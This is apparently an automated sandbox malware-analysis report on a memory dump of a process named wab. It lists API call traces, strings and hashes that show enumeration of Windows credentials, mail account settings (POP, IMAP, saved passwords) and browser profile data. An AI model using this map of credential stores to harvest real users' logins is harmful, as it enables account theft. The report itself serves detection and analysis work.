                                  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                • String ID: TranslatorName$TranslatorURL$general$strings
                                • API String ID: 1035899707-3647959541
                                • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                APIs
                                • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                • SelectObject.GDI32(?,?), ref: 0040CACC
                                • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                  • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                  • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                  • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                • SetCursor.USER32(00000000), ref: 0040CB35
                                • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                • SetFocus.USER32(?), ref: 0040CB92
                                • SetFocus.USER32(?), ref: 0040CC0B
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                • String ID:
                                • API String ID: 1416211542-0
                                • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                • API String ID: 2360744853-2229823034
                                • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                APIs
                                • strchr.MSVCRT ref: 004100E4
                                • _mbscpy.MSVCRT ref: 004100F2
                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                  • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                • _mbscpy.MSVCRT ref: 00410142
                                • _mbscat.MSVCRT ref: 0041014D
                                • memset.MSVCRT ref: 00410129
                                  • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                  • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                                • memset.MSVCRT ref: 00410171
                                • memcpy.MSVCRT ref: 0041018C
                                • _mbscat.MSVCRT ref: 00410197
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                • String ID: \systemroot
                                • API String ID: 912701516-1821301763
                                • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$strlen
                                • String ID: -journal$-wal$immutable$nolock
                                • API String ID: 2619041689-3408036318
                                • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@$strlen
                                • String ID:
                                • API String ID: 4288758904-3916222277
                                • Opcode ID: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                • Opcode Fuzzy Hash: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                APIs
                                  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                • wcslen.MSVCRT ref: 0040874A
                                • _wcsncoll.MSVCRT ref: 00408794
                                • memset.MSVCRT ref: 0040882A
                                • memcpy.MSVCRT ref: 00408849
                                • wcschr.MSVCRT ref: 0040889F
                                • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$FreeLibraryLoadLocal_wcsncollmemcpymemsetwcschrwcslen
                                • String ID: J$Microsoft_WinInet
                                • API String ID: 2203907242-260894208
                                • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                APIs
                                • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                • memcpy.MSVCRT ref: 00410961
                                Strings
                                • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: FromStringUuid$memcpy
                                • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                • API String ID: 2859077140-2022683286
                                • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                APIs
                                  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                • _mbscpy.MSVCRT ref: 00409686
                                • _mbscpy.MSVCRT ref: 00409696
                                • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                  • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: PrivateProfile_mbscpy$AttributesFileString
                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                • API String ID: 888011440-2039793938
                                • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                APIs
                                Strings
                                • unable to open database: %s, xrefs: 0042EBD6
                                • out of memory, xrefs: 0042EBEF
                                • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                • too many attached databases - max %d, xrefs: 0042E951
                                • cannot ATTACH database within transaction, xrefs: 0042E966
                                • database %s is already in use, xrefs: 0042E9CE
                                • database is already attached, xrefs: 0042EA97
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpymemset
                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                • API String ID: 1297977491-2001300268
                                • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                APIs
                                  • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                • strchr.MSVCRT ref: 0040327B
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: PrivateProfileStringstrchr
                                • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                • API String ID: 1348940319-1729847305
                                • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                • API String ID: 3510742995-3273207271
                                • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                APIs
                                  • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                • memset.MSVCRT ref: 0040FA1E
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                • _strnicmp.MSVCRT ref: 0040FA4F
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                • String ID: WindowsLive:name=*$windowslive:name=
                                • API String ID: 945165440-3589380929
                                • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _mbscpy$sprintfstrchrstrlen
                                • String ID: %s@gmail.com
                                • API String ID: 3902205911-4097000612
                                • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                APIs
                                • memset.MSVCRT ref: 004094C8
                                • GetDlgCtrlID.USER32(?), ref: 004094D3
                                • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                • memset.MSVCRT ref: 0040950C
                                • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                • _strcmpi.MSVCRT ref: 00409531
                                  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                • String ID: sysdatetimepick32
                                • API String ID: 3411445237-4169760276
                                • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                APIs
                                • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                • EndDialog.USER32(?,00000002), ref: 00405A96
                                • EndDialog.USER32(?,00000001), ref: 00405AA9
                                  • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                  • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                  • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Item$DialogMessageSend
                                • String ID:
                                • API String ID: 2485852401-0
                                • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                APIs
                                • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                • GetSysColor.USER32(0000000F), ref: 0040B472
                                • DeleteObject.GDI32(?), ref: 0040B4A6
                                • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: MessageSend$DeleteImageLoadObject$Color
                                • String ID:
                                • API String ID: 3642520215-0
                                • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                • String ID:
                                • API String ID: 2313361498-0
                                • Opcode ID: c48968d120a8350dafd0b05c892d8c8183d7a77208ced883aa7f681ff77c883e
                                • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                • Opcode Fuzzy Hash: c48968d120a8350dafd0b05c892d8c8183d7a77208ced883aa7f681ff77c883e
                                • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                APIs
                                • GetClientRect.USER32(?,?), ref: 0040BB33
                                • GetWindowRect.USER32(?,?), ref: 0040BB49
                                • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Window$Defer$Rect$BeginClient
                                • String ID:
                                • API String ID: 2126104762-0
                                • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                APIs
                                • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                • GetDC.USER32(00000000), ref: 004072FB
                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                • String ID:
                                • API String ID: 1999381814-0
                                • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpymemset
                                • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                • API String ID: 1297977491-3883738016
                                • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                APIs
                                  • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                  • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                  • Part of subcall function 00449550: memcpy.MSVCRT ref: 004495C8
                                  • Part of subcall function 00449550: memcpy.MSVCRT ref: 00449616
                                • memcpy.MSVCRT ref: 0044972E
                                • memcpy.MSVCRT ref: 0044977B
                                • memcpy.MSVCRT ref: 004497F6
                                  • Part of subcall function 00449260: memcpy.MSVCRT ref: 00449291
                                  • Part of subcall function 00449260: memcpy.MSVCRT ref: 004492DD
                                • memcpy.MSVCRT ref: 00449846
                                • memcpy.MSVCRT ref: 00449887
                                • memcpy.MSVCRT ref: 004498B8
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memset
                                • String ID: gj
                                • API String ID: 438689982-4203073231
                                • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: __aulldvrm$__aullrem
                                • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                • API String ID: 643879872-978417875
                                • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpymemset$strlen$_memicmp
                                • String ID: user_pref("
                                • API String ID: 765841271-2487180061
                                • Opcode ID: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
